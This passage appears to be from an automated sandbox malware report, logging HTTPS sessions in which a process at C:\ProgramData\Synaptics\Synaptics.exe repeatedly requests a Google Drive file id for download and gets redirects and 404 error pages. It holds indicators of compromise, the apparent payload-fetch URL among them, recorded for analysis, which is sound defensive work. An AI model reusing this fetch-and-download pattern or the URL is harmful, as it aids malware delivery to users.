                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:12 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-bmoHyBlJIsDv8-RX3CMxNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:12 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:12 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 6c 38 4e 66 47 49 43 4f 37 64 50 42 71 37 77 44 55 56 64 71 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="ol8NfGICO7dPBq7wDUVdqw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:12 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              86192.168.2.750025216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:13 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              87192.168.2.750024216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:13 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              88192.168.2.750028142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:13 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              89192.168.2.750029142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:13 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              90192.168.2.750035216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:14 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:15 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:14 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-PZKIi0vk9UA0CGxO71T7bg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              91192.168.2.750036216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:14 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:15 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:14 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-WbjPaukgUtYe1WFoogkqYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              92192.168.2.750048142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:15 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:16 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC5-aRwqRjZQYgC0cilP-45WGa1E-BQ1MIyMi7Swbm4x97l_PFxy9v-haiGYCp6fjVKVbw7UAeQ
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:16 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-o6J4vcjE0xr1j0J33dIhDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:16 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:16 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 7a 6a 4b 36 77 76 73 39 66 4f 4f 72 58 6b 42 74 39 65 39 62 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="fzjK6wvs9fOOrXkBt9e9bg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:16 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              93192.168.2.750049216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:15 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:16 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:16 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-4jq8vXt4DyjhO5KDbqlWsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              94192.168.2.750050142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:15 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:16 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC4OYYUwQEUEwxsMVIap11AW8jo9_eH5SVpNXezkBVUVFASN8D43YAU5gqh2ALRWYpse
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:16 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-1FYnJ68lbdA4fyaXAmeNHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:16 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:16 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 45 56 79 39 45 76 58 70 33 55 75 41 6b 5f 73 47 34 68 2d 65 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="bEVy9EvXp3UuAk_sG4h-eA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:16 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              95192.168.2.750051216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:15 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:16 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:16 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-fgbx3vLGzvhzGE3VwLn0rQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
